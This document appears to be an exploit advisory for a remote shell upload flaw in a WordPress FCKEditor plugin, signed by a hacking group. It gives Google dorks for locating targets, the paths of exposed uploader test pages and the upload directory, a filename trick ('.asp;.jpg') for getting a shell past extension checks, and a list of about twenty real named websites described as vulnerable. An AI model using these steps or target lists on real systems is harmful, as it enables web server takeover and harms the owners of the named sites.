################################################################################################# # Exploit Title : WordPress FCKEditor-For-Wordpress-Plugin 3.3.1 Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/12/2018 # Vendor Homepage : wordpress.org/support/plugin/fckeditor-for-wordpress-plugin # Software Download Link : github.com/kcloze/kcloze-blog/archive/master.zip + github.com/kcloze/kcloze-blog/tree/master/wp-content/plugins/fckeditor-for-wordpress-plugin # Tested On : Windows and Linux # Category : WebApps # Version Information : 2.0 ~ 2.2 ~ 2.6.2 ~ 2.8.4 ~ 3.3.1 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/fckeditor-for-wordpress-plugin/'' + intext:''DESIGN BY PURR.'' + intext:''powered by WordPress. InBiz theme made it free by desain web. Hosting by rozhled.cz'' + intext:''Site entraA(r)nA(c) par WordPress | Connexion | Flux (RSS) des articles | ThA"me Arthemia de Michael Jubel | Stats'' + intext:''designed by Portland Web Design'' + intext:''A(c) 2009 websitemagix.com powered by fotomagix'' + intext:''powered by fotomagix'' + intext:''realizace webu: Pavel Gloss'' + intext:''A(c) 2008 - 2018 Heather Richards Live | All Rights Reserved.'' + intext:''Powered by WordPress ( WordPress Deutschland ) - Handcoded by Tommaso Baldovino - German translation and modification by Schwarze Dame'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] ################################################################################################# # Exploit : /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html /wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/frmupload.html /wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/browser.html # Directory File Path : /wp-content/uploads/..... /wp-content/uploads/[YEAR]/[MONTH]/...... ################################################################################################# # Note : Select PHP extension and then Try to upload as .asp;.jpg filename shell extension. # Note : This plugin fckeditor-for-wordpress-plugin contains a very serious vulnerability that allowed hackers to gain full control a modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website, a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the pluginas directory. ################################################################################################# Vulnerable File Code => /uploadtest.html ************************************* FCKeditor - Uploaders Tests
Select the "File Uploader" to use:
Resource Type
       Custom Uploader URL:

Upload a new file:

       Uploaded File URL:

Post URL:  
################################################################################################# # Example Vulnerable Sites => [+] steamykitchen.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] n-vac.co.jp/tool/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] senftenberg.cz/wordpress/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] ville-rochefortdugard.fr/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] jalak.eu/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] carolwhitemarketing.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] etkingrup.com.tr/haber/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] zohnertheater.ch/amberroad/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] gialongvn.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] websitemagix.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] taiyaki-ya.com/wp/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] locthanhphat.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] zko157.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] duolongo.se/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] sof.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] heatherrichardslive.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] textmah.com/sites/zane/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] nongngucolam.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] drogy-sos.sk/photoland/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] kukk.de/affiliateblog/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html [+] nttprov.go.id/penghubung/web/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################